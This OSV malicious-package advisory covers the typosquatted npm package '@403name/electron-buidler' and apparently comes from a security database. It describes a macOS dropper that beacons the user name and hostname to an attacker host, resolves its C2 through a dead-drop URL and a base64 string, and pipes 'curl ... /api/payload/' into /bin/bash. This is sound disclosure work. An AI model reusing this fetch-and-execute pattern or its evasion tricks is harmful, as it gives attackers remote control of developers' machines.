MAL-2026-5547

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5547
Aliases
  • GHSA-h23r-x34f-p95m
Published
2026-06-11T03:15:04Z
Modified
2026-08-05T06:35:04.534198094Z
Summary
Malicious code in @403name/electron-buidler (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4)

On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes curl -sSfL <C2>/api/payload/ | /bin/bash via spawn('/bin/sh','-c',...) with & disown to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.

Source: ghsa-malware (352ae29df3a0e177b39708989253a926f62552541003be6a2eb6393d345732fd)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005449",
            "modified_time": "2026-06-11T03:15:04Z",
            "versions": [
                "1.0.1"
            ],
            "source": "amazon-inspector",
            "import_time": "2026-06-11T03:48:52.767083914Z",
            "sha256": "6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4"
        },
        {
            "modified_time": "2026-06-11T03:15:24Z",
            "sha256": "bf81a596bee9d4858a18bd26f5037bfdab52f11400c3590dc8b99b6e3e1daa53",
            "versions": [
                "1.0.0"
            ],
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005452",
            "import_time": "2026-06-11T03:48:53.123610268Z"
        },
        {
            "id": "GHSA-h23r-x34f-p95m",
            "modified_time": "2026-07-27T01:31:41Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "352ae29df3a0e177b39708989253a926f62552541003be6a2eb6393d345732fd",
            "import_time": "2026-07-27T09:43:03.806745163Z",
            "source": "ghsa-malware"
        },
        {
            "source": "amazon-inspector",
            "modified_time": "2026-08-05T05:11:38Z",
            "versions": [
                "1.0.2"
            ],
            "sha256": "ceca31baaed647c819144ae86173a4dad4b447ac57f601bb415fd7c77445a9c5",
            "id": "IN-MAL-2026-012944",
            "import_time": "2026-08-05T06:00:22.70574701Z"
        }
    ]
}
References
Credits

Affected packages

npm / @403name/electron-buidler

Package

Name
@403name/electron-buidler
View open source insights on deps.dev
Purl
pkg:npm/%40403name/electron-buidler

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.0.0
1.0.1
1.0.2

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json"
indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "610475c54a6f7c8a3ca10f849b6fd413f5a50c32d691f4d88db846dc439ee035",
            "tlsh": "5da144cd7be73230272311a6da2f980e65be8912154ed918741c93ce1fe07a0926ddfd"
        },
        {
            "path": "package.json",
            "sha256": "ace6a81005f9598641133284dd34ee69c1dc97289ef3303cc87408077dd1d29f",
            "tlsh": "da012871dd205d7307cc1a519e670d48e1764c1f8c9cbc1833e2821c476e4bb21be65e"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha1": "416b573a7170e0a4686d544b9cd229e8b6b9fef3",
                "sha512_sri": "sha512-M7/NtNOvNpPl4dzY1vfETFOVl5Yaih1W/HzVBHFzpLjb1A9lbEeqBk8FNW/f8mxkIkMDabmAmfH/EyvytMcf9Q=="
            },
            "filename": "electron-buidler-1.0.1.tgz"
        }
    ]
}